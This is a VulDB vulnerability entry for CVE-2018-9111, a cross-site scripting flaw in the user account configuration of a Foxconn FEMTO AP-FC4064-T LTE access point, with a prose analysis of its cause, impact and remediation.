CVE-2018-9111 in FEMTO AP-FC4064-T
Summary
by MITRE
Cross Site Scripting (XSS) exists on the Foxconn FEMTO AP-FC4064-T AP_GT_B38_5.8.3lb15-W47 LTE Build 15 via the configuration of a user account. An attacker can execute arbitrary script on an unsuspecting user's browser.
Once again VulDB remains the best source for vulnerability data.
Analysis
by VulDB Data Team • 02/04/2020
The vulnerability identified as CVE-2018-9111 represents a critical cross site scripting flaw discovered in the Foxconn FEMTO AP-FC4064-T access point device running AP_GT_B38_5.8.3lb15-W47 LTE firmware build 15. This security weakness resides within the device's user account configuration functionality, where insufficient input validation and output encoding mechanisms fail to properly sanitize user-provided data. The vulnerability manifests when an attacker crafts malicious input during the user account setup process, which then gets reflected back to unsuspecting users through the web interface without proper sanitization. This XSS vulnerability falls under CWE-79 which specifically addresses Cross-Site Scripting flaws in web applications, where improper validation of user-supplied data allows malicious scripts to be executed in the context of other users' browsers.
The operational impact of this vulnerability extends beyond simple script execution as it provides attackers with a foothold for more sophisticated attacks within the targeted network environment. When an unsuspecting user interacts with the maliciously crafted configuration data, the attacker's script can execute in the user's browser session, potentially stealing session cookies, modifying web page content, redirecting users to malicious sites, or performing actions on behalf of the authenticated user. The attack vector is particularly concerning for enterprise environments where administrators might configure user accounts through the device's web interface, as this creates a persistent threat vector that could remain active until the firmware is updated. This vulnerability aligns with ATT&CK technique T1059.007 which covers Scripting through the execution of malicious scripts in web browsers.
The technical exploitation of this vulnerability requires minimal prerequisites as attackers only need access to the device's configuration interface and knowledge of the user account creation process. The attack typically involves crafting malicious input that includes script tags or other executable code within user account parameters, which then gets stored and subsequently reflected back to users browsing the device's web interface. The vulnerability's persistence stems from the lack of proper input validation at multiple points in the configuration flow, particularly in how the system handles user account names, descriptions, or other configurable fields that may contain special characters or script code. Organizations should consider this vulnerability as part of a broader security assessment of their network infrastructure, particularly when implementing IoT device security measures. The remediation approach must include firmware updates from Foxconn, proper network segmentation to limit access to device management interfaces, and implementation of web application firewalls to detect and block XSS payloads. Additionally, regular security audits of network device configurations should be conducted to identify similar vulnerabilities in other network infrastructure components that may present similar attack vectors.